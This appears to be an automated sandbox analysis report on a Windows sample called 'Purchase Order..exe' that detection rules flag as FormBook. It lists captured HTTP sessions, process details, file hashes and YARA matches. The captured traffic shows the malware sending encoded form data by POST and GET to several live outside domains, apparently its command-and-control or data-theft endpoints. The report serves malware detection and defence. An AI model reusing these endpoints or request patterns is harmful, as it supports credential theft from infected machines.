                                                          Referer: http://www.cstrategy.online/qx5d/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Dec 3, 2024 14:26:54.641143084 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 03 Dec 2024 13:26:54 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 178
                                                          Connection: close
                                                          Location: https://www.cstrategy.online/qx5d/
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          4 | 192.168.2.8 | 49720 | 194.76.119.60 | 80 | 516 | C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 14:26:55.953367949 CET | 369 | OUT | GET /qx5d/?MVWd=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPvvTYRvxaqp7vn6p2LTuI6fSpdFMX3ZLUkPs/SWb4JECmGQ==&kfm=dFj0Olb HTTP/1.1
                                                          Host: www.cstrategy.online
                                                          Accept: */*
                                                          Accept-Language: en-us
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Dec 3, 2024 14:26:57.317573071 CET | 541 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 03 Dec 2024 13:26:57 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 178
                                                          Connection: close
                                                          Location: https://www.cstrategy.online/qx5d/?MVWd=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPvvTYRvxaqp7vn6p2LTuI6fSpdFMX3ZLUkPs/SWb4JECmGQ==&kfm=dFj0Olb
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          5 | 192.168.2.8 | 49722 | 103.224.182.242 | 80 | 516 | C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 14:27:03.776510000 CET | 619 | OUT | POST /6ou6/ HTTP/1.1
                                                          Host: www.madhf.tech
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.madhf.tech
                                                          Content-Length: 205
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.madhf.tech/6ou6/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Ascii: MVWd=bcTWnB08V6+cMyAChHoCete2afKVv/HJBIK1741gegLH/ov8yq9/IgPEX223NS04PXPTK64e0Fq/6xUxWdTB9W7j/NFl2Mhd5IphPEb7Q76/KsskEWAKUOxJLPdgugDwtDNbSnqCm1e6C99JfxmuELLmZoyNndgFSCER/Resd2JxtFNlEWvZVBV1N8Ml0bsX50H5HZI=
                                                          Dec 3, 2024 14:27:05.017127991 CET | 871 | IN | HTTP/1.1 200 OK
                                                          date: Tue, 03 Dec 2024 13:27:04 GMT
                                                          server: Apache
                                                          set-cookie: __tad=1733232424.2662998; expires=Fri, 01-Dec-2034 13:27:04 GMT; Max-Age=315360000
                                                          vary: Accept-Encoding
                                                          content-encoding: gzip
                                                          content-length: 576
                                                          content-type: text/html; charset=UTF-8
                                                          connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          6 | 192.168.2.8 | 49723 | 103.224.182.242 | 80 | 516 | C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 14:27:06.441685915 CET | 639 | OUT | POST /6ou6/ HTTP/1.1
                                                          Host: www.madhf.tech
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.madhf.tech
                                                          Content-Length: 225
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.madhf.tech/6ou6/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Ascii: MVWd=bcTWnB08V6+cOWECtA8CWtexZfKVkfHVBJ2175w7eVjH66381uJ/NgPEcW2IDy0vPXDxK5ge0EK/6zMxRurC9G7h3tFj7shd5IphPAzRQ7i/LfkkLSULL+xIIPdglAD0tDM2Sizfm3W6C4RJfjCtOLLkGYzjvtJpUyg/iROwf2MPoz8Pe0nfWB9eN/kTxsx/jXXJZOe+bKwANI1mt0jnFjCDPS4O
                                                          Dec 3, 2024 14:27:07.710576057 CET | 871 | IN | HTTP/1.1 200 OK
                                                          date: Tue, 03 Dec 2024 13:27:07 GMT
                                                          server: Apache
                                                          set-cookie: __tad=1733232427.8390935; expires=Fri, 01-Dec-2034 13:27:07 GMT; Max-Age=315360000
                                                          vary: Accept-Encoding
                                                          content-encoding: gzip
                                                          content-length: 576
                                                          content-type: text/html; charset=UTF-8
                                                          connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          7 | 192.168.2.8 | 49724 | 103.224.182.242 | 80 | 516 | C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 14:27:09.098942995 CET | 1656 | OUT | POST /6ou6/ HTTP/1.1
                                                          Host: www.madhf.tech
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.madhf.tech
                                                          Content-Length: 1241
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.madhf.tech/6ou6/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Dec 3, 2024 14:27:10.373516083 CET | 871 | IN | HTTP/1.1 200 OK
                                                          date: Tue, 03 Dec 2024 13:27:10 GMT
                                                          server: Apache
                                                          set-cookie: __tad=1733232430.2077707; expires=Fri, 01-Dec-2034 13:27:10 GMT; Max-Age=315360000
                                                          vary: Accept-Encoding
                                                          content-encoding: gzip
                                                          content-length: 576
                                                          content-type: text/html; charset=UTF-8
                                                          connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          8 | 192.168.2.8 | 49725 | 103.224.182.242 | 80 | 516 | C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 14:27:11.750102043 CET | 363 | OUT | GET /6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5Q/485VI7OI/8adtFmnjL5G+X4c0GC9YevItAMgBvFKG4A==&kfm=dFj0Olb HTTP/1.1
                                                          Host: www.madhf.tech
                                                          Accept: */*
                                                          Accept-Language: en-us
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Dec 3, 2024 14:27:13.061113119 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          date: Tue, 03 Dec 2024 13:27:12 GMT
                                                          server: Apache
                                                          set-cookie: __tad=1733232432.1876202; expires=Fri, 01-Dec-2034 13:27:12 GMT; Max-Age=315360000
                                                          vary: Accept-Encoding
                                                          content-length: 1502
                                                          content-type: text/html; charset=UTF-8
                                                          connection: close
                                                          Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5Q/485VI7OI/8adtFmnjL5G+X4c0GC9YevItAMgBvFKG4A==&kfm=dFj0Olb&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#fff
                                                          Dec 3, 2024 14:27:13.061270952 CET | 538 | IN
                                                          Data Ascii: fff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5Q/485VI7OI/8adtFmnjL5G+X4c0GC9YevItAMgBvFKG4A==&kfm=dFj0Olb&fp=-3'>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          9 | 192.168.2.8 | 49726 | 188.114.96.6 | 80 | 516 | C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 14:27:18.509380102 CET | 631 | OUT | POST /v89f/ HTTP/1.1
                                                          Host: www.bser101pp.buzz
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.bser101pp.buzz
                                                          Content-Length: 205
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.bser101pp.buzz/v89f/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Ascii: MVWd=iTfEV/Gi0JnQQaER7Xj8i31gQDajEzkh8SHhYEYh/cfQ3Aw744xH6jezg7Ccuw02qR4gT3RNmWUsW7QUx1ZE2Yo5hh3GT3TuUX6gG5fE9qmYHztE4V+dH4ofZqiZg6nzoD/uCqzOP6Q7bBFdukhUK+dWLxV29XPp018ys/v8sxixZru5dCrFZ6wzPdrGERp9+/bW/h0=
                                                          Dec 3, 2024 14:27:19.780008078 CET | 972 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 13:27:19 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nzkmMgX7hAH%2Bm97loqvHeP1p7yz8GLRvkDCNE05aZQTHntbGzyR%2BESEFFyaFuZZfjTV6d6lf6zECd4zGLpL7JWr6h0XtSLMaZLDqa8tRB5R5G6aGENbEQsktyVynRToLzbu0BQ4%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec3e4baff950f85-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1681&rtt_var=840&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=631&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          10 | 192.168.2.8 | 49727 | 188.114.96.6 | 80 | 516 | C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 14:27:21.221596956 CET | 651 | OUT | POST /v89f/ HTTP/1.1
                                                          Host: www.bser101pp.buzz
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.bser101pp.buzz
                                                          Content-Length: 225
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.bser101pp.buzz/v89f/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Ascii: MVWd=iTfEV/Gi0JnQW5sR52j8lX1jfjajOTkl8SDhYFcx+uLQ0hA7i5xH2Dez4LDWwA09qR0STzRNmWAsW5YUwCNH2Io7tB3AOnTuUX6gG5Lu9uKYHDdEqgCccYoceqiZ3qn3oD/ICrvgP5o7bA1duQVLfOdcPxUl+lGS2FMAhODwg3mOcdfTHgjDa6YYPeDwBm0VkcLmh2iwP+ItyD+yPCbzPg+FD4h3
                                                          Dec 3, 2024 14:27:22.371922016 CET | 978 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 13:27:22 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DNkww1UWROTOo%2Blk68FSR2qThOGbuDk3tnMRoTBKFOaWoUavcohUuXGztV3L3iD%2BUCZGOLEAnJPRrEzTKTPX%2BbfMiNkN1yuZ2sYsuak2ZU%2FnZN%2Fd8Dp7ob2ZxhZLH74DkE7Gb6s%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec3e4cb4f618cba-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1830&rtt_var=915&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=651&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          11 | 192.168.2.8 | 49728 | 188.114.96.6 | 80 | 516 | C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 14:27:23.949754953 CET | 1668 | OUT | POST /v89f/ HTTP/1.1
                                                          Host: www.bser101pp.buzz
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.bser101pp.buzz
                                                          Content-Length: 1241
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.bser101pp.buzz/v89f/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Dec 3, 2024 14:27:25.141880989 CET | 977 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 13:27:24 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XCy3YQYA1lfXqxnAMS6BJLEGhc3jGG9HfPFvCd36ZKeHtkpuZtjhxdcDDkztvLEZD6r5V76EqbhNjtqfFMJgth2dkOG%2B479QCq2ZDYiI4YKve14s%2BVDgul%2FMlyyeY7eche%2FLiNs%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec3e4dc9e8842b2-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1756&rtt_var=878&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1668&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          12 | 192.168.2.8 | 49729 | 188.114.96.6 | 80 | 516 | C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 14:27:26.835736990 CET | 367 | OUT | GET /v89f/?MVWd=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k2NYglVjUbXXrY07zMLLi7rmhcEJnvkrNOok7dcSq1J6Z3g==&kfm=dFj0Olb HTTP/1.1
                                                          Host: www.bser101pp.buzz
                                                          Accept: */*
                                                          Accept-Language: en-us
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Dec 3, 2024 14:27:28.045676947 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 13:27:27 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rzkl7NWsk3UkFgzvkz7zTOa5hmLHq1FEv0tp1hnubdSblP2mwWu7%2BNXZ4Y%2BL019cEAmk84zMgcWIH1X31hOknhpCoGKlqloK40VblXVWemRygVvXV0bKPqpYcuQnYsei%2Fi4lMe8%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec3e4eea9a32363-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1749&rtt_var=874&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=367&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome fri
                                                          Dec 3, 2024 14:27:28.045747042 CET | 96 | IN
                                                          Data Ascii: endly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          13 | 192.168.2.8 | 49730 | 3.33.130.190 | 80 | 516 | C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 14:27:33.526524067 CET | 652 | OUT | POST /8m07/ HTTP/1.1
                                                          Host: www.goldstarfootwear.shop
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.goldstarfootwear.shop
                                                          Content-Length: 205
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.goldstarfootwear.shop/8m07/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Ascii: MVWd=7fvor6a+xd+5pjFNxDPsvq/Ttn/vqXRdrk3RPKNIXslDoplgZs6UYD5jl1Z1QPc+zwZM874ARwvwtMMHTr/aQIPm8bVlZ11NE+3MC3QMzDfkEZeWDwu6bT6L5I0N6jlfhUhobCt2xg2gOyXlVtGobRHM0OLylQA/is9sPL+wNe24EXqLz5QYZjSd7p3l4wQQa5kLLlU=


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          14 | 192.168.2.8 | 49731 | 3.33.130.190 | 80 | 516 | C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 14:27:36.266535044 CET | 672 | OUT | POST /8m07/ HTTP/1.1
                                                          Host: www.goldstarfootwear.shop
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.goldstarfootwear.shop
                                                          Content-Length: 225
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.goldstarfootwear.shop/8m07/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Ascii: MVWd=7fvor6a+xd+5vDVNzk7s76/cxX/vj3RBrk7RPOUTXeRDoIVgfd6UIT5jtVZwUPcDzwdy86EARwrwtN8HT4HVQYPk07VnWV1NE+3MC3FpzDHkEpuWCVO5Wz6KoI0NpzlThUgNbDwjxm6gOznlMcGrVhHC3+KduFhokPEXUoqrB4GaIBbhpbYeaj627qfT9HN4Aa07VyBqYQnnNy9AZxIl9ziWjY7S


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          15 | 192.168.2.8 | 49732 | 3.33.130.190 | 80 | 516 | C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 14:27:39.338541985 CET | 1689 | OUT | POST /8m07/ HTTP/1.1
                                                          Host: www.goldstarfootwear.shop
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.goldstarfootwear.shop
                                                          Content-Length: 1241
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.goldstarfootwear.shop/8m07/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36


                                                          Target ID:0
                                                          Start time:08:25:33
                                                          Start date:03/12/2024
                                                          Path:C:\Users\user\Desktop\Purchase Order..exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Purchase Order..exe"
                                                          Imagebase:0xc20000
                                                          File size:766'976 bytes
                                                          MD5 hash:ECB3A0578FE97356ED12DA57BC6BBC36
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:08:25:36
                                                          Start date:03/12/2024
                                                          Path:C:\Users\user\Desktop\Purchase Order..exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Purchase Order..exe"
                                                          Imagebase:0xda0000
                                                          File size:766'976 bytes
                                                          MD5 hash:ECB3A0578FE97356ED12DA57BC6BBC36
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1836694214.0000000001B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1836855226.0000000003140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:08:26:07
                                                          Start date:03/12/2024
                                                          Path:C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe"
                                                          Imagebase:0xc10000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:6
                                                          Start time:08:26:09
                                                          Start date:03/12/2024
                                                          Path:C:\Windows\SysWOW64\isoburn.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\isoburn.exe"
                                                          Imagebase:0xf50000
                                                          File size:107'008 bytes
                                                          MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2659993689.0000000000A80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2659764496.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:9
                                                          Start time:08:26:23
                                                          Start date:03/12/2024
                                                          Path:C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe"
                                                          Imagebase:0xc10000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:11
                                                          Start time:08:26:35
                                                          Start date:03/12/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff6d20e0000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true


                                                            Execution Graph

                                                            Execution Coverage:7.2%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:78
                                                            Total number of Limit Nodes:8

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 0166D3D6
                                                            • GetCurrentThread.KERNEL32 ref: 0166D413
                                                            • GetCurrentProcess.KERNEL32 ref: 0166D450
                                                            • GetCurrentThreadId.KERNEL32 ref: 0166D4A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
